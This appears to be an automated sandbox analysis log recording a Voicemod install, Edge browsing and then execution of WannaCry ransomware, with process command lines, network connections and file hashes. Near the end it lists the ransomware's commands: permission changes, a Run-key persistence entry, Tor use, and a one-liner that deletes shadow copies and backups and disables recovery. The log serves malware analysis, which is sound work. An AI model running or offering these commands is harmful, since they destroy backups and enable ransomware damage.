cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-santa-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-sleepyhead*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spacemen-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-speechifier-ovation-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-speechifier-protest-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spirit-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spirit-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-action-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-drama-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-happy-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-student-hall*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-student-playtime*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-sword-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-underwater*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-1*.wav

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-vocoder2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cooltune-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-punk-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx01*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx02*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx03*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx04*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx05*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx06*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx07*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx08*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx09*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx10*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx11*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx12*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx13*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx14*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx15*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar5*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar6*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky5*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-exo*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-gameover-amb*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-outofrange*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-titan-background-part1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-titan-background-part2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx16*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx17*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx18*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx19*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx20*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-bass*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-octava*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-quinta*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-tercera*.wav

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\b43ab3069362483181a941af35f01f2c /t 2884 /p 2540

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffebf5546f8,0x7ffebf554708,0x7ffebf554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6820 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6840 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8

C:\Users\Admin\Downloads\WannaCry.EXE

"C:\Users\Admin\Downloads\WannaCry.EXE"

C:\Users\Admin\Downloads\WannaCry.EXE

"C:\Users\Admin\Downloads\WannaCry.EXE"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 168181731701469.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\cb0d49af1875490aabfc9dcdc5646821 /t 1696 /p 1328

C:\Users\Admin\Downloads\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\@[email protected]

@[email protected] vs

C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rxknciwttsoogz987" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rxknciwttsoogz987" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 aka.ms udp
GB 23.46.73.173:443 aka.ms tcp
US 8.8.8.8:53 download.visualstudio.microsoft.com udp
US 199.232.210.172:443 download.visualstudio.microsoft.com tcp
US 8.8.8.8:53 173.73.46.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 141.92.23.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 3.26.192.23.in-addr.arpa udp
US 8.8.8.8:53 sdk.voicemod.net udp
BE 34.38.70.171:80 sdk.voicemod.net tcp
US 8.8.8.8:53 171.70.38.34.in-addr.arpa udp
US 8.8.8.8:53 windows.voicemod.net udp
GB 18.175.85.90:443 windows.voicemod.net tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
US 8.8.8.8:53 90.85.175.18.in-addr.arpa udp
GB 18.175.85.90:443 windows.voicemod.net tcp
US 8.8.8.8:53 40.169.217.172.in-addr.arpa udp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
US 8.8.8.8:53 download.voicemod.net udp
US 172.64.152.183:443 download.voicemod.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 183.152.64.172.in-addr.arpa udp
BE 34.38.70.171:80 sdk.voicemod.net tcp
GB 18.175.85.90:443 windows.voicemod.net tcp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
GB 18.175.85.90:443 windows.voicemod.net tcp
GB 172.217.169.40:443 ssl.google-analytics.com tcp
N/A 224.0.0.251:5353 udp
GB 88.221.135.27:443 www.bing.com tcp
GB 88.221.135.27:443 www.bing.com tcp
US 8.8.8.8:53 27.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 95.101.143.201:443 th.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.201:443 th.bing.com tcp
US 8.8.8.8:53 201.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 219.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 185.199.108.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 40.126.31.69:443 login.microsoftonline.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:52840 tcp
FR 163.172.157.213:443 tcp
DE 131.188.40.189:443 tcp
US 8.8.8.8:53 189.40.188.131.in-addr.arpa udp
US 185.40.4.95:15443 tcp
US 8.8.8.8:53 95.4.40.185.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

memory/4340-2-0x0000000000401000-0x000000000040C000-memory.dmp

memory/4340-0-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp

MD5 1a9f24ba757fd08f3b4db5570cd1bfd0
SHA1 6c8e5ee1db1bb8471dc2c2c7a1d9835d60df2d8d
SHA256 326071c6e04b3552414337cea066d809d987dbddbc8ad717626abc9dff748956
SHA512 bbc2bc152363d789c636941f71894b8a6062a5b37b33748c5e7eb6014bbb8ee0461c29fd892272758ece489abbe7cc4e0695f094a4963411723f698456c308a6

memory/5116-6-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4340-12-0x0000000000400000-0x000000000041C000-memory.dmp

memory/5116-13-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/5116-14-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/5116-23-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

MD5 60271d3806a3def814980266fd07f32d
SHA1 b862f3c346ef7d5834c5196dd5596c39296ceb17
SHA256 d2a3683c8078509b09d97da2d190dc9c19f52d22003e31bf29e352beb611be91
